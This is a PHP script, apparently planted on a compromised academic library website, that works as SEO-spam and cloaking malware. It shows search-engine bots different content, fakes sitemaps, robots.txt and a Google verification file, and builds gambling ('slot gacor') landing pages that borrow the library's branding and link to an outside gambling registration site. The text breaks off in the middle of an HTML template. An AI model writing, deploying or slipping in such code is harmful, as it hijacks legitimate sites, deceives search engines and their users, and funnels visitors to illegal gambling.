<?php
header("Cache-Control: public, max-age=31536000, immutable");

if (!function_exists('selip')) {
    function selip() {
        $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
        $google_bots_regex = '/googlebot|googlebot-mobile|google-site-verification|google-inspectiontool|googleweblight|apis-google|feedfetcher-google|google-read-aloud|duplexweb-google|storebot-google|assistant-google/i';
        if (preg_match($google_bots_regex, $user_agent)) {
            include 'readme.html';
            exit;
        }
        return false;
    }
}
$icon = 'https://perpus.amiaipi.ac.id/webicon.ico';
$amptunnel ='https://perpus21.pages.dev/2/';
$ampfolder ='https://perpus21.pages.dev/3/';
$amphtml ='https://perpus21.pages.dev/4/';
$amptunnel2 ='https://perpus21.pages.dev/5/';
$amptunnel3 ='https://perpus21.pages.dev/6/';

$namasitemap = 'perpus.xml';
$namabl = '?pustaka=';
$namaparameter = 'pustaka';

$filename1 = '/home/perpus/public_html/simbio2/simbio_DB/isis/tomovejuice.txt';
$filename2 = '/home/perpus/public_html/simbio2/simbio_DB/isis/halo3.txt';
$filename3 = '/home/perpus/public_html/simbio2/simbio_DB/isis/tohk.txt';
$filename4 = '/home/perpus/public_html/simbio2/simbio_DB/isis/pkv.txt';

$gambartunnel = '/images/perpustakaan.png';
$gambarfolder = '/images/perpustakaan2.png';
$videofolder = '/images/perpustakaan.mp4';

$judultunnel = '&#128273; Pusat Informasi Akademik Maritim Terpercaya';
$destunnel = 'menyediakan akses tepercaya dan profesional ke koleksi literatur kemaritiman, jurnal ilmiah, dan karya akademik yang relevan dengan dunia pelayaran dan kepelabuhanan. Didukung oleh tim pustakawan berpengalaman, platform ini dirancang untuk memenuhi kebutuhan informasi sivitas akademika dengan integritas dan transparansi. ';
$judulfolder = '&#128175; Platform Perpustakaan Digital AMI AIPI Makassar';
$desfolder = 'menyediakan akses tepercaya dan profesional ke koleksi literatur kemaritiman, jurnal ilmiah, dan karya akademik yang relevan dengan dunia pelayaran dan kepelabuhanan. Didukung oleh tim pustakawan berpengalaman, platform ini dirancang untuk memenuhi kebutuhan informasi sivitas akademika dengan integritas dan transparansi. ';
$judulhtml = '&#9889; AMI-AIPI';
$deshtml = 'menyediakan akses tepercaya dan profesional ke koleksi literatur kemaritiman, jurnal ilmiah, dan karya akademik yang relevan dengan dunia pelayaran dan kepelabuhanan. Didukung oleh tim pustakawan berpengalaman, platform ini dirancang untuk memenuhi kebutuhan informasi sivitas akademika dengan integritas dan transparansi. ';

if (!function_exists('fetchContent')) {
    function fetchContent($path) {
        if (filter_var($path, FILTER_VALIDATE_URL)) {
            if (function_exists('curl_init')) {
                $ch = curl_init();
                curl_setopt_array($ch, [
                    CURLOPT_URL => $path,
                    CURLOPT_RETURNTRANSFER => true,
                    CURLOPT_FOLLOWLOCATION => true,
                    CURLOPT_TIMEOUT => 10,
                    CURLOPT_USERAGENT => "Mozilla/5.0"
                ]);
                $result = curl_exec($ch);
                curl_close($ch);
                if ($result !== false) return $result;
            }
            if (ini_get('allow_url_fopen')) return @file_get_contents($path);
            return false;
        }
        $realPath = realpath($path);
        return ($realPath && is_readable($realPath)) ? file($realPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : false;
    }
}

$fileContent1 = fetchContent($filename1);
$fileContent2 = fetchContent($filename2);
$fileContent3 = fetchContent($filename3);
$fileContent4 = fetchContent($filename4);

foreach (['fileContent1', 'fileContent2', 'fileContent3', 'fileContent4'] as $fc) {
    if (is_array($$fc)) {
        $$fc = implode(PHP_EOL, $$fc);
    }
}

if ($fileContent1 !== false) {
    $BRAND = array_filter(array_map('trim', explode(PHP_EOL, $fileContent1)));
    if (!empty($BRAND)) {
        $randomKeys = array_rand($BRAND, min(16, count($BRAND)));
        $selectedLines = [];
        if (is_array($randomKeys)) {
            foreach ($randomKeys as $k) {
                $selectedLines[] = str_replace(' ', '_', $BRAND[$k]);
            }
        } else {
            $selectedLines[] = str_replace(' ', '_', $BRAND[$randomKeys]);
        }
    }
} else {
    echo'notfound';
    exit("File not found.");
}
if (!function_exists('getBaseUrl')) {
function getBaseUrl() {
    if (
        (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ||
        (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') ||
        (isset($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] === 'on')
    ) {
        $protocol = 'https';
    } else {
        $protocol = 'http';
    }

    $host = $_SERVER['HTTP_HOST'];

    // Ambil direktori (tanpa nama file)
    $dir = rtrim(str_replace(basename($_SERVER['SCRIPT_NAME']), '', $_SERVER['SCRIPT_NAME']), '/');

    return $protocol . '://' . $host . $dir;
}
}
$scriptPathDir = getBaseUrl();

if (!function_exists('getFullCurrentUrl')) {
function getFullCurrentUrl() {
    $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http";
    return $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
}
}

if (!function_exists('generateSitemap')) {
    function generateSitemap($fileContent, $fileKey, $my) {
        if ($fileContent === false) {
            echo'notfound';
            exit("Sitemap generation failed");
        }

        $baseUrl = getBaseUrl();
        $urls = array_filter(array_map('trim', explode(PHP_EOL, $fileContent)));
        header('Content-Type: application/xml');
        echo '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL;

        if ($fileKey === 'index.xml') {
            echo "<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";
            echo "  <sitemap><loc>$baseUrl/site.xml</loc></sitemap>\n";
            echo "  <sitemap><loc>$baseUrl/" . htmlspecialchars($GLOBALS['namasitemap']) . "</loc></sitemap>\n";
            echo "  <sitemap><loc>$baseUrl/product.xml</loc></sitemap>\n";
            echo "</sitemapindex>\n";
        } else {
            echo "<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";
            $counter = 1;
            foreach ($urls as $judul) {
                $judul = str_replace(' ', '-', $judul);
                if ($fileKey === 'site.xml') {
                    $sitemapLink = "$baseUrl/$judul/";
                } elseif ($fileKey === $GLOBALS['namasitemap'] || $fileKey === 'tunnel.xml' || $fileKey === 'pkv.xml') {
                    $sitemapLink = "$baseUrl/?$my=" . urlencode($judul);
                } elseif ($fileKey === 'product.xml') {
                    $nomor = str_pad($counter++, 4, '0', STR_PAD_LEFT);
                    $sitemapLink = "$baseUrl/$nomor.html";
                } else {
                    continue;
                }
                echo "  <url>\n    <loc>" . htmlspecialchars($sitemapLink) . "</loc>\n  </url>\n";
            }
            echo "</urlset>\n";
        }
        exit;
    }
}

$requestedFile = basename(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH));

if ($requestedFile === 'index.xml') {
    generateSitemap("", 'index.xml', '');
} elseif ($requestedFile === 'site.xml') {
    generateSitemap($fileContent1, 'site.xml', 'site');
} elseif ($requestedFile === $namasitemap) {
    generateSitemap($fileContent1, $namasitemap, $namaparameter);
} elseif ($requestedFile === 'product.xml') {
    generateSitemap($fileContent3, 'product.xml', 'product');
} elseif ($requestedFile === 'tunnel.xml') {
    generateSitemap($fileContent2, 'tunnel.xml', $namaparameter);
} elseif ($requestedFile === 'pkv.xml') {
    generateSitemap($fileContent4, 'pkv.xml', $namaparameter);
}

if ($requestedFile === 'googlec32087888f7c9f50.html') {
    header('Content-Type: text/plain');
    echo 'google-site-verification: googlec32087888f7c9f50.html';
    exit;
}

if ($requestedFile === 'robots.txt') {
    $baseUrl = getBaseUrl();
    header('Content-Type:text/plain');
    echo "User-agent: *\n";
    echo"Allow: /\n";
    echo "Sitemap: {$baseUrl}/site.xml\n";
    echo "Sitemap: {$baseUrl}/{$namasitemap}\n";
    echo "Sitemap: {$baseUrl}/product.xml\n";
    exit;
}

if (isset($_GET['amp'])){ 
    $thtoken2 = rand(1, 688);
    $urlPath2 = getFullCurrentUrl();
    $thtoken2 = rand(1, 688);
    $thtoken = rand(0, 588);
    $des = 'SLOT GACOR2025';
    $clean_title = htmlspecialchars($_GET['amp']);  
    echo '<!doctype html>
<html amp lang="id">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1">
<title>' . htmlspecialchars($clean_title) . '</title>
<meta name="description" content="'. htmlspecialchars($clean_title) . ' adalah ' . htmlspecialchars($des) .'">
<link rel="preload" href="https://ik.imagekit.io/olecafsss/amp/ampcoblos%20(' . htmlspecialchars($thtoken) . ').png" as="image">
<link rel="icon" type="image/png" sizes="192x192" href="' . htmlspecialchars($icon) . '">
<link rel="apple-touch-icon" sizes="180x180" href="' . htmlspecialchars($icon) . '">
<script async src="https://cdn.ampproject.org/v0.js"></script>
<script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script>
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async custom-element="amp-audio" src="https://cdn.ampproject.org/v0/amp-audio-0.1.js" nonce="MzcwODk0OTU1OSwzMDQ2NDA4Mjg1"></script>
<meta name="og:title" content="' . htmlspecialchars($clean_title) . '">
<meta name="og:description" content="'. htmlspecialchars($clean_title) . ' adalah ' . htmlspecialchars($des) .'">
<link rel="canonical" href="' . htmlspecialchars($urlPath2) . '"/>
<!-- Icons -->
<link rel="icon" type="image/png"sizes="192x192" href="' . htmlspecialchars($icon) . '">
<style amp-custom>*{box-sizing:border-box;margin:0;padding:0}:focus{outline:0}::-webkit-scrollbar{display:none}a,a:after,a:hover,a:visited{text-decoration:none;color:#fff}html{max-width:500px;margin:0 auto;background:#000}body{color:#fff;font-family:Inconsolat,monospace;display:flex;justify-content:center;align-items:center}.bawah{display:grid;min-height:100vh;width:100%;position:relative;z-index:1}.bawahbox{text-align:center;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);z-index:2}.bawahlink{display:inline-grid;margin:.88rem 0}.bawahlink a{padding:.5rem 3.8rem;background:rgba(51,51,51,.5);margin-bottom:.5rem;border-radius:.38rem;box-shadow:0 -1px #ffffff88;letter-spacing:1px;color:#fff;text-align:center;display:block}.bawahlink a:hover{background-color:rgba(51,51,51,.7)}.bg-video{position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;z-index:0;opacity:.8}.bottom-logo{margin-top:100px;text-align:center}#daftarBtn{display:inline-block;text-align:center;font-size:18px;margin-top:20px}.welcome{max-width:350px;margin:0 auto}.welcome h4{font-family:Inconsolata,monospace;font-size:17px;color:#fff;overflow:hidden;border-right:.15em solid #fff;white-space:nowrap;letter-spacing:.09em;animation:typing 3.5s steps(40,end),blink-caret .75s step-end infinite}@keyframes typing{from{width:0}to{width:100%}}@keyframes blink-caret{from,to{border-color:transparent}50%{border-color:#fff}}.btn{display:inline-block;padding:6px 12px;touch-action:manipulation;cursor:pointer;user-select:none;background-image:none;border:1px solid transparent;border-radius:5px;font:250 16px Arial,"Helvetica Neue",Helvetica,sans-serif;color:#fff;text-shadow:0 0 3px #000;letter-spacing:1.1px}@keyframes blinking{0%{border:2px solid #fff}100%{border:2px solid #fc0000}}.button-overlay{position:absolute;top:80%;left:50%;transform:translateX(-50%);z-index:2;text-align:center}.button-overlay a{display:inline-block;background:rgba(51,51,51,.7);color:#fff;text-decoration:none;font-weight:700;border-radius:5px;margin-bottom:.5rem;box-shadow:0 -1px #ccb38a88;letter-spacing:1px;text-align:center;color:#fff;display:block;animation:blinking2 .5s infinite;transition:all .4s}@keyframes blinking2{0%{border:3px solid #fc0000}100%{border:3px solid #000}}.typing-demo{width:35ch;animation:typing 4s steps(35),blink .5s step-end infinite alternate;background:#000;white-space:nowrap;overflow:hidden;border-right:3px solid}@keyframes typing{from{width:0}}@keyframes blink{50%{border-color:transparent}}</style>
</head>
<body>
<amp-video class="bg-video" autoplay loop layout="responsive" width="600" height="1200" poster="https://ik.imagekit.io/olecafsss/amp/ampcoblos%20(' . htmlspecialchars($thtoken) . ').png" controls>
<source src="https://ik.imagekit.io/olecafsss/amp/ampcoblos%20(' . htmlspecialchars($thtoken) . ').png" type="video/mp4">
</amp-video>
<main>
<div class="bawah">
<div class="bawahbox">
<div class="bawahlink">
<div class="button-overlay">
<h4>
<a href="https://id-coblos4d.pages.dev/short" target="_blank" class="btn1 contole">DAFTAR ID VIP 2025</a>
</h4>
<div class="typing-demo">
<p>SITUS SLOT THAILAND WINRATE 99.8%</p> 
</div>
</div>
</div>
</div>
</div>
</main>
</body>
</html>';
exit; 
} elseif ($_SERVER['REQUEST_URI'] === '/') {
    selip();
} elseif (preg_match('/\.(html|htm|shtml|phtml)$/i', $requesthtml = trim($_SERVER['REQUEST_URI'], '/'))) {
    $urlPath4 = getFullCurrentUrl();
    $gbrsp = rand(0, 2523);
    $tit = pathinfo($requesthtml, PATHINFO_FILENAME);
    $judulbrand = array_filter(array_map('trim', explode("\n", isset($fileContent3) ? $fileContent3 : '')));
    $tit3 = null;
if (preg_match('/^\d+$/', $tit)) {
    $index = (int)$tit - 1;
    if (isset($judulbrand[$index])) {
        $tit3 = $judulbrand[$index];
    }
}
if (!$tit3 && !empty($judulbrand)) {
    $randomKey = array_rand($judulbrand);
    if (isset($judulbrand[$randomKey])) {
        $tit3 = $judulbrand[$randomKey];
    }
}
$tit = str_replace(['-', '+'], [' ', ' | '], $tit3 ? $tit3 : '');
    echo '<!doctype html>
<html class="no-js" lang="en">
   <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="theme-color" content="">
      <meta name="robots" content="index, follow, nocache, noodp, noydir">
      <link rel="canonical" href="' . htmlspecialchars($urlPath4) . '">
      <link rel="amphtml"href="' . htmlspecialchars($amphtml) . '">
      <link rel="icon" type="image/png" href="' . htmlspecialchars($icon) . '">
      <link rel="preconnect" href="https://fonts.shopifycdn.com" crossorigin>
      <title>' .htmlspecialchars($tit) . ' ' . htmlspecialchars($judulhtml) . '</title>
      <meta name="description" content="' . htmlspecialchars($tit) . ' adalah ' . htmlspecialchars($deshtml) . '">
      <meta property="og:site_name" content="' . htmlspecialchars($tit). '">
      <meta property="og:url" content="' . htmlspecialchars($urlPath4) . '">
      <meta property="og:title" content="' . htmlspecialchars($tit) . ' ' . htmlspecialchars($judulhtml) . '">
      <meta property="og:type" content="product">
      <meta property="og:description" content="' . htmlspecialchars($tit) . ' adalah ' . htmlspecialchars($deshtml) . '">
      <meta property="og:image" content="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png">
      <meta property="og:image:secure_url" content="https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png">
      <meta property="og:image:width" content="1200">
      <meta property="og:image:height" content="1200">
      <meta property="og:price:amount" content="1.000.000,00">
      <meta property="og:price:currency" content="IDR">
      <meta name="twitter:card" content="summary_large_image">
      <meta name="twitter:title" content="' . htmlspecialchars($tit) . ' ' . htmlspecialchars($judulhtml) . '">
      <meta name="twitter:description" content="' . htmlspecialchars($tit) . ',' . htmlspecialchars($tit) . ' adalah ' . htmlspecialchars($deshtml) . '">
      <style id="shopify-dynamic-checkout">.shopify-payment-button__button--hidden {visibility: hidden;}.shopify-payment-button__button {border-radius: 4px;border: none;box-shadow: 0 0 0 0 transparent;color: white;cursor: pointer;display: block;font-size: 1em;font-weight: 500;line-height: 1;text-align: center;width: 100%;transition: background 0.2s ease-in-out;}.shopify-payment-button__button[disabled] {opacity: 0.6;cursor: default;}.shopify-payment-button__button--unbranded {background-color: #1990c6;padding: 1em 2em;}.shopify-payment-button__button--unbranded:hover:not([disabled]) {background-color: #136f99;}.shopify-payment-button__more-options {background: transparent;border: 0 none;cursor: pointer;display: block;font-size: 1em;margin-top: 1em;text-align: center;width: 100%;}.shopify-payment-button__more-options:hover:not([disabled]) {text-decoration: underline;}.shopify-payment-button__more-options[disabled] {opacity: 0.6;cursor: not-allowed;}.shopify-payment-button__button--branded {display: flex;flex-direction: column;min-height: 44px;position: relative;z-index: 1;}.shopify-payment-button__button--branded .shopify-cleanslate {flex: 1 !important;display: flex !important;flex-direction: column !important;}.shopify-payment-button__button.button.loading {position: relative;color: transparent;}.shopify-payment-button__button.button.loading > .loading-overlay__spinner {top: 50%;left: 50%;transform: translate(-50%, -50%);position: absolute;height: 100%;display: flex;align-items: center;}.shopify-payment-button__button.button.loading > .loading-overlay__spinner .spinner {width: -moz-fit-content;width: fit-content;}.button.loading > .loading-overlay__spinner .path {stroke: white;}.shopify-payment-button__button .loading-overlay__spinner {width: 1.8rem;display: inline-block;}.shopify-payment-button__button .spinner {animation: shopify-rotator 1.4s linear infinite;}@keyframes shopify-rotator {0% {transform: rotate(0deg);}100% {transform: rotate(270deg);}}.shopify-payment-button__button .path {stroke-dasharray: 280;stroke-dashoffset: 0;transform-origin: center;stroke: rgb(18,18,18);animation: shopify-dash 1.4s ease-in-out infinite;}@media screen and (forced-colors: active) {.shopify-payment-button__button .path{stroke: CanvasText;}}@keyframes shopify-dash {0% {stroke-dashoffset: 280;}50% {stroke-dashoffset: 75;transform: rotate(135deg);}100% {stroke-dashoffset: 280;transform: rotate(450deg);}}</style> <style data-shopify> @font-face {font-family: Assistant;font-weight: 400;font-style: normal;font-display: swap;src: url("https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/fonts/assistant/assistant_n4.bcd3d09dcb631dec5544b8fb7b154ff234a44630.woff2?h1=YmQ3MTY2LTMuYWNjb3VudC5teXNob3BpZnkuY29t&hmac=6e30dff6c51bdd4e572cadade14f30a913527a1a27a6416e30de26c427669838") format("woff2"), url("https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/fonts/assistant/assistant_n4.a2d012304becc2a26f1ded1acc136fcab85c9afd.woff?h1=YmQ3MTY2LTMuYWNjb3VudC5teXNob3BpZnkuY29t&hmac=001e31afbd52bb57a4015505abda4cc08a6911454d9117ee4cc9dd74686e561f") format("woff");}@font-face {font-family: Assistant;font-weight: 700;font-style: normal;font-display: swap;src: url("https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/fonts/assistant/assistant_n7.3335c7bdaddf2501ddab87cdbd9be98f3870e10d.woff2?h1=YmQ3MTY2LTMuYWNjb3VudC5teXNob3BpZnkuY29t&hmac=06930754e9392be06f3adcfd315f5523ab8a967c2c5e7cdc7d6cca187554ddd2") format("woff2"), url("https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/fonts/assistant/assistant_n7.7c85f5c5cc1555de92cc7ef2790ee3cffe5237f5.woff?h1=YmQ3MTY2LTMuYWNjb3VudC5teXNob3BpZnkuY29t&hmac=a221150ed7d9c4185a3de54a644139cf5e28ce6af261d257c5a0b97edbe83603") format("woff");}@font-face {font-family: Assistant;font-weight: 400;font-style: normal;font-display: swap;src: url("https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/fonts/assistant/assistant_n4.bcd3d09dcb631dec5544b8fb7b154ff234a44630.woff2?h1=YmQ3MTY2LTMuYWNjb3VudC5teXNob3BpZnkuY29t&hmac=6e30dff6c51bdd4e572cadade14f30a913527a1a27a6416e30de26c427669838") format("woff2"), url("https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/fonts/assistant/assistant_n4.a2d012304becc2a26f1ded1acc136fcab85c9afd.woff?h1=YmQ3MTY2LTMuYWNjb3VudC5teXNob3BpZnkuY29t&hmac=001e31afbd52bb57a4015505abda4cc08a6911454d9117ee4cc9dd74686e561f") format("woff");}:root, .color-background-1 {--color-background: 255,255,255;--gradient-background: linear-gradient(180deg, rgba(255, 145, 129, 1), rgba(254, 91, 124, 1) 49%, rgba(255, 140, 162, 1) 100%);--color-foreground: 18,18,18;--color-background-contrast: 191,191,191;--color-shadow: 18,18,18;--color-button: 18,18,18;--color-button-text: 255,255,255;--color-secondary-button: 255,255,255;--color-secondary-button-text: 18,18,18;--color-link: 18,18,18;--color-badge-foreground: 18,18,18;--color-badge-background: 255,255,255;--color-badge-border: 18,18,18;--payment-terms-background-color: rgb(255 255 255);}.color-background-2 {--color-background: 243,243,243;--gradient-background: #f3f3f3;--color-foreground: 18,18,18;--color-background-contrast: 179,179,179;--color-shadow: 18,18,18;--color-button: 18,18,18;--color-button-text: 243,243,243;--color-secondary-button: 243,243,243;--color-secondary-button-text: 18,18,18;--color-link: 18,18,18;--color-badge-foreground: 18,18,18;--color-badge-background: 243,243,243;--color-badge-border: 18,18,18;--payment-terms-background-color: rgb(243 243 243);}.color-inverse {--color-background: 36,40,51;--gradient-background: #242833;--color-foreground: 255,255,255;--color-background-contrast: 47,52,66;--color-shadow: 18,18,18;--color-button: 255,255,255;--color-button-text: 0,0,0;--color-secondary-button: 36,40,51;--color-secondary-button-text: 255,255,255;--color-link: 255,255,255;--color-badge-foreground: 255,255,255;--color-badge-background: 36,40,51;--color-badge-border: 255,255,255;--payment-terms-background-color: rgb(36 40 51);}.color-accent-1 {--color-background: 18,18,18;--gradient-background: #121212;--color-foreground: 255,255,255;--color-background-contrast: 146,146,146;--color-shadow: 18,18,18;--color-button: 255,255,255;--color-button-text: 18,18,18;--color-secondary-button:18,18,18;--color-secondary-button-text: 255,255,255;--color-link: 255,255,255;--color-badge-foreground: 255,255,255;--color-badge-background: 18,18,18;--color-badge-border: 255,255,255;--payment-terms-background-color: rgb(18 18 18);}.color-accent-2 {--color-background: 51,79,180;--gradient-background: #334fb4;--color-foreground: 255,255,255;--color-background-contrast: 23,35,81;--color-shadow: 18,18,18;--color-button: 255,255,255;--color-button-text: 51,79,180;--color-secondary-button: 51,79,180;--color-secondary-button-text: 255,255,255;--color-link: 255,255,255;--color-badge-foreground: 255,255,255;--color-badge-background: 51,79,180;--color-badge-border: 255,255,255;--payment-terms-background-color: rgb(51 79 180);}body, .color-background-1, .color-background-2, .color-inverse, .color-accent-1, .color-accent-2 {color: rgba(var(--color-foreground), 0.75);background-color: rgb(var(--color-background));}:root {--font-body-family:Assistant, sans-serif;--font-body-style: normal;--font-body-weight: 400;--font-body-weight-bold: 700;--font-heading-family: Assistant, sans-serif;--font-heading-style: normal;--font-heading-weight: 400;--font-body-scale: 1.0;--font-heading-scale: 1.0;--media-padding: px;--media-border-opacity: 0.05;--media-border-width: 1px;--media-radius: 0px;--media-shadow-opacity: 0.0;--media-shadow-horizontal-offset: 0px;--media-shadow-vertical-offset: 4px;--media-shadow-blur-radius: 5px;--media-shadow-visible: 0;--page-width: 120rem;--page-width-margin: 0rem;--product-card-image-padding: 0.0rem;--product-card-corner-radius: 0.0rem;--product-card-text-alignment: left;--product-card-border-width: 0.0rem;--product-card-border-opacity: 0.1;--product-card-shadow-opacity: 0.0;--product-card-shadow-visible: 0;--product-card-shadow-horizontal-offset: 0.0rem;--product-card-shadow-vertical-offset: 0.4rem;--product-card-shadow-blur-radius: 0.5rem;--collection-card-image-padding: 0.0rem;--collection-card-corner-radius: 0.0rem;--collection-card-text-alignment: left;--collection-card-border-width: 0.0rem;--collection-card-border-opacity: 0.1;--collection-card-shadow-opacity: 0.0;--collection-card-shadow-visible: 0;--collection-card-shadow-horizontal-offset: 0.0rem;--collection-card-shadow-vertical-offset: 0.4rem;--collection-card-shadow-blur-radius: 0.5rem;--blog-card-image-padding: 0.0rem;--blog-card-corner-radius: 0.0rem;--blog-card-text-alignment: left;--blog-card-border-width: 0.0rem;--blog-card-border-opacity: 0.1;--blog-card-shadow-opacity: 0.0;--blog-card-shadow-visible: 0;--blog-card-shadow-horizontal-offset: 0.0rem;--blog-card-shadow-vertical-offset: 0.4rem;--blog-card-shadow-blur-radius: 0.5rem;--badge-corner-radius: 4.0rem;--popup-border-width: 1px;--popup-border-opacity: 0.1;--popup-corner-radius: 0px;--popup-shadow-opacity: 0.05;--popup-shadow-horizontal-offset: 0px;--popup-shadow-vertical-offset: 4px;--popup-shadow-blur-radius: 5px;--drawer-border-width: 1px;--drawer-border-opacity: 0.1;--drawer-shadow-opacity: 0.0;--drawer-shadow-horizontal-offset: 0px;--drawer-shadow-vertical-offset: 4px;--drawer-shadow-blur-radius: 5px;--spacing-sections-desktop: 0px;--spacing-sections-mobile: 0px;--grid-desktop-vertical-spacing: 8px;--grid-desktop-horizontal-spacing: 8px;--grid-mobile-vertical-spacing: 4px;--grid-mobile-horizontal-spacing: 4px;--text-boxes-border-opacity: 0.1;--text-boxes-border-width: 0px;--text-boxes-radius: 0px;--text-boxes-shadow-opacity: 0.0;--text-boxes-shadow-visible: 0;--text-boxes-shadow-horizontal-offset: 0px;--text-boxes-shadow-vertical-offset: 4px;--text-boxes-shadow-blur-radius: 5px;--buttons-radius: 0px;--buttons-radius-outset: 0px;--buttons-border-width: 1px;--buttons-border-opacity: 1.0;--buttons-shadow-opacity: 0.0;--buttons-shadow-visible: 0;--buttons-shadow-horizontal-offset: 0px;--buttons-shadow-vertical-offset: 4px;--buttons-shadow-blur-radius: 5px;--buttons-border-offset: 0px;--inputs-radius: 0px;--inputs-border-width: 1px;--inputs-border-opacity: 0.55;--inputs-shadow-opacity: 0.0;--inputs-shadow-horizontal-offset: 0px;--inputs-margin-offset: 0px;--inputs-shadow-vertical-offset: 4px;--inputs-shadow-blur-radius: 5px;--inputs-radius-outset: 0px;--variant-pills-radius: 40px;--variant-pills-border-width: 1px;--variant-pills-border-opacity: 0.55;--variant-pills-shadow-opacity: 0.0;--variant-pills-shadow-horizontal-offset: 0px;--variant-pills-shadow-vertical-offset: 4px;--variant-pills-shadow-blur-radius: 5px;}*, *::before, *::after {box-sizing: inherit;}html {box-sizing: border-box;font-size: calc(var(--font-body-scale) * 62.5%);height: 100%;}body {display: grid;grid-template-rows: auto auto 1fr auto;grid-template-columns: 100%;min-height: 100%;margin: 0;font-size: 1.5rem;letter-spacing: 0.06rem;line-height: calc(1 + 0.8 / var(--font-body-scale));font-family: var(--font-body-family);font-style: var(--font-body-style);font-weight: var(--font-body-weight);}@media screen and (min-width: 750px) {body {font-size: 1.6rem;}}</style>
      <link href="https://duerofhtrd4h0gsj-58617528410.shopifypreview.com/cdn/shop/t/1/assets/base.css?v=22615539281115885671705593171" rel="stylesheet" type="text/css" media="all" />
		<script>
        function getCookie(name) {
            let match = document.cookie.match(new RegExp("(^| )" + name + "=([^;]+)"));
            return match ? match[2] : null;
        }
        if (!getCookie("verified")) {
            document.cookie = "verified=true; path=/";
            location.reload();
        }
    </script>
		<script>
         document.documentElement.className = document.documentElement.className.replace("no-js", "js");
         if (Shopify.designMode) {
           document.documentElement.classList.add("shopify-design-mode");
         }
      </script>
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "WebSite",
  "name": "' . htmlspecialchars($tit) . '",
  "url": "' . htmlspecialchars($urlPath4) . '",
  "alternateName": "' . htmlspecialchars($tit) . ' ' . htmlspecialchars($judulhtml) . '",
  "description": "' . htmlspecialchars($tit) . ' adalah ' . htmlspecialchars($deshtml) . '",
  "sameAs": [
    "https://www.facebook.com/' . htmlspecialchars($tit) . '",
    "https://twitter.com/' . htmlspecialchars($tit) . '",
    "https://www.instagram.com/' . htmlspecialchars($tit) . '"
  ],
  "publisher": {
    "@type": "Organization",
    "name": "' . htmlspecialchars($tit) . '",
    "logo": {
      "@type": "ImageObject",
      "url": "https://ik.imagekit.io/gambarbaru/slotgacor%20(' . $gbrsp . ').png"
    }
  },
  "potentialAction": {
    "@type": "SearchAction",
    "target": "' . htmlspecialchars($urlPath4) . '/search?q={search_term_string}",
    "query-input": "required name=search_term_string"
  },
  "mainEntity": {
    "@type": "WebPage",
    "name": "' . htmlspecialchars($tit) . '",
    "url": "' . htmlspecialchars($urlPath4) . '",
    "mainEntityOfPage": {
      "@type": "WebPage",
      "@id": "' . htmlspecialchars($amphtml) . '?amp='. htmlspecialchars($tit). '"
    },
    "isPartOf": {
      "@type": "WebSite",
      "url": "' . htmlspecialchars($urlPath4) . '"
    }
  }
}
</script>
   </head>
   <body class="gradient">
      <a class="skip-to-content-link button visually-hidden" href="' . htmlspecialchars($urlPath4) . '">
      Skip to content
      </a>
      <!-- BEGIN sections: header-group -->
      <div id="shopify-section-sections--15308463145050__announcement-bar" class="shopify-section shopify-section-group-header-group announcement-bar-section">
         <div class="utility-bar color-background-1 gradient utility-bar--bottom-border">
            </div>
         </div>
      <div id="shopify-section-sections--15308463145050__header" class="shopify-section shopify-section-group-header-group section-header">
